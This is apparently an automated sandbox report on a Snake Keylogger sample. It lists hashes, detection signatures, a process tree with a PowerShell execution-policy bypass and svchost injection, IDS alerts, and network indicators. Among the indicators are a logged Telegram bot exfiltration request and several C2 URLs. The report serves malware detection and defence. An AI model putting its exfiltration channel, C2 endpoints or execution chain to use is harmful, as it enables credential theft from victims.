
Windows Analysis Report
g1TLK7mbZD.img

Overview

General Information

Sample name: g1TLK7mbZD.img
Analysis ID: 1541369
MD5: 213a8ce5aaa962f33a78f6053f6956ba
SHA1: 339df70ab6152e4b20d81d4180943fc6fcb1f752
SHA256: 5d4a99440308479e4b97797fc6518240e1617df62bb938d3f735026931d7bed3

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Suspicious PowerShell Parameter Substring
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64native
  • cmd.exe (PID: 3484 cmdline: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1728 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • udfs.sys (PID: 4 cmdline: MD5: 26D2727935221EFB0063B43A74B375BE)
  • 9236-pagaconferma-jpg.exe (PID: 8268 cmdline: "D:\9236-pagaconferma-jpg.exe" MD5: 1AEFAA71B8996D22CAD66A84A7F279A0)
    • svchost.exe (PID: 8376 cmdline: "D:\9236-pagaconferma-jpg.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
No configs have been found
Source | Rule | Description | Author
Source: 00000007.00000002.31560050751.0000000003570000.00000004.00001000.00020000.00000000.sdmp | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen
Source: 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
Source: 00000008.00000002.33967794321.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen
Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security

        System Summary

        Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3484, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), ProcessId: 1728, ProcessName: powershell.exe
        Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\udfs.sys, NewProcessName: C:\Windows\System32\drivers\udfs.sys, OriginalFileName: C:\Windows\System32\drivers\udfs.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: udfs.sys
        Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "D:\9236-pagaconferma-jpg.exe" , CommandLine: "D:\9236-pagaconferma-jpg.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "D:\9236-pagaconferma-jpg.exe" , ParentImage: \Device\CdRom0\9236-pagaconferma-jpg.exe, ParentProcessId: 8268, ParentProcessName: 9236-pagaconferma-jpg.exe, ProcessCommandLine: "D:\9236-pagaconferma-jpg.exe" , ProcessId: 8376, ProcessName: svchost.exe
        Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3484, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), ProcessId: 1728, ProcessName: powershell.exe
        Source: Process started; Author: vburov; Data: Command: "D:\9236-pagaconferma-jpg.exe" , CommandLine: "D:\9236-pagaconferma-jpg.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "D:\9236-pagaconferma-jpg.exe" , ParentImage: \Device\CdRom0\9236-pagaconferma-jpg.exe, ParentProcessId: 8268, ParentProcessName: 9236-pagaconferma-jpg.exe, ProcessCommandLine: "D:\9236-pagaconferma-jpg.exe" , ProcessId: 8376, ProcessName: svchost.exe
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-24T18:36:03.459445+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49792 | 104.21.67.152 | 443 | TCP
        2024-10-24T18:36:04.219404+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49794 | 104.21.67.152 | 443 | TCP
        2024-10-24T18:36:06.972892+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49800 | 104.21.67.152 | 443 | TCP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-24T18:36:01.522384+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49790 | 158.101.44.242 | 80 | TCP
        2024-10-24T18:36:03.053396+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49790 | 158.101.44.242 | 80 | TCP
        2024-10-24T18:36:03.774476+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49793 | 158.101.44.242 | 80 | TCP


        AV Detection

        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe, ReversingLabs: Detection: 18%
        Source: g1TLK7mbZD.img, ReversingLabs: Detection: 31%
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe, Joe Sandbox ML: detected

        Location Tracking

        Source: unknown, DNS query: name: reallyfreegeoip.org
        Source: unknown, HTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49791 version: TLS 1.0
        Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49807 version: TLS 1.2
        Source: Binary string: _.pdb source: svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: 9236-pagaconferma-jpg.exe, 00000007.00000003.31555020352.0000000004900000.00000004.00001000.00020000.00000000.sdmp, 9236-pagaconferma-jpg.exe, 00000007.00000003.31558367702.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: 9236-pagaconferma-jpg.exe, 00000007.00000003.31555020352.0000000004900000.00000004.00001000.00020000.00000000.sdmp, 9236-pagaconferma-jpg.exe, 00000007.00000003.31558367702.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp

        Networking

        Source: C:\Windows\SysWOW64\svchost.exe, Network Connect: 158.101.44.242 80
        Source: C:\Windows\SysWOW64\svchost.exe, Network Connect: 149.154.167.220 443
        Source: C:\Windows\SysWOW64\svchost.exe, Network Connect: 104.21.67.152 443
        Source: unknown, DNS query: name: api.telegram.org
        Source: Yara match, File source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: global traffic, HTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1 | Host: reallyfreegeoip.org
        Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2024/10/2024%20/%2020:04:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
        Source: Joe Sandbox View, IP Address: 149.154.167.220
        Source: Joe Sandbox View, IP Address: 104.21.67.152
        Source: Joe Sandbox View, IP Address: 158.101.44.242
        Source: Joe Sandbox View, ASN Name: TELEGRAMRU
        Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
        Source: Joe Sandbox View, ASN Name: ORACLE-BMC-31898US
        Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknown, DNS query: name: checkip.dyndns.org
        Source: unknown, DNS query: name: reallyfreegeoip.org
        Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49793 -> 158.101.44.242:80
        Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49790 -> 158.101.44.242:80
        Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49794 -> 104.21.67.152:443
        Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49800 -> 104.21.67.152:443
        Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49792 -> 104.21.67.152:443
        Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
        Source: unknown, HTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49791 version: TLS 1.0
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic, DNS traffic detected: DNS query: checkip.dyndns.org
        Source: global traffic, DNS traffic detected: DNS query: reallyfreegeoip.org
        Source: global traffic, DNS traffic detected: DNS query: api.telegram.org
        Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 24 Oct 2024 16:36:10 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
        Source: svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://aborters.duckdns.org:8081
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://anotherarmy.dns.army:8081
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.31858413420.0000000003285000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/
        Source: svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/q
        Source: svchost.exe, 00000008.00000003.31665166705.000000000328F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.31675311378.000000000328F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968691053.0000000003291000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: svchost.exe, 00000008.00000002.33975648249.0000000007D00000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://varders.kozow.com:8081
        Source: svchost.exe, 00000008.00000002.33975648249.0000000007D00000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.quovadis.bm0
        Source: svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org
        Source: svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot
        Source: svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
        Source: svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20a
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058C6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000058B1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=en
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
        Source: svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab0
        Source: svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eicar.org/
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005969000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005975000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005969000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005969000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: svchost.exe, 00000008.00000002.33975648249.0000000007D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
        Source: svchost.exe, 00000008.00000002.33970405843.00000000057C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005753000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005753000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
        Source: svchost.exe, 00000008.00000002.33970405843.000000000577D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/154.16.192.225
        Source: svchost.exe, 00000008.00000002.33970405843.00000000057C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000577D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/154.16.192.225$
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
